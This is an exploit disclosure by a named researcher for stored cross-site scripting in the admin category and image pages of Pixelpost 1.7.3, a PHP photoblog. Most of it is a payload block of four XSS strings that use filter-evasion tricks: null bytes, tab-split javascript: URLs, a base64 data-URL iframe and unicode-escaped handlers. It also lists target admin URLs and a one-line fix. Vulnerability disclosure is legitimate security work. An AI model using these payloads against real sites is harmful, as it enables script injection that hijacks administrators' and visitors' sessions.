Exploit Title: pixelpost 1.7.3  Cross Site Scripting Vulnerabilities
# Date: 06/03/2013
# Author: Nikhalesh Singh Bhadoria
# Twitter: @nikhaleshsingh
#Download Link:http://www.pixelpost.org/
# Versions Affected: pixelpost 1.7.3
# Category:Xss
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Vulnerabilitie Description:

The Vulnerabilities in admin area categories options and many other place input in is not sanitized. Therefore it results
in a stored cross-site scripting

Pixelpost Description
Pixelpost is a photoblog application powered by PHP and MySQL. It's developed and maintained by photobloggers who like to keep the
 meaning behind photoblogging in mind, the photography, and not about the 311 hacks you would have to get through to get your regular blog to work

POC:
http://www.youtube.com/watch?v=afjIFOuXG38&feature=youtu.be

Code :-
########################################################################################################
"><img src=x onerror=prompt(0);>

<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>

 <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

 <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>


http://demo.xxx.com/admin/index.php?view=categories
http://demo.xxx.com/http:/admin/index.php?
http://demo.xxx.com/http:/admin/index.php?view=images

##########################################################################################################
Fix:
Better sanitization by restricting special characters.

Regard's
Nikhalesh Singh Bhadoria
Information Security Enthusiast
Website:Gurunsb.com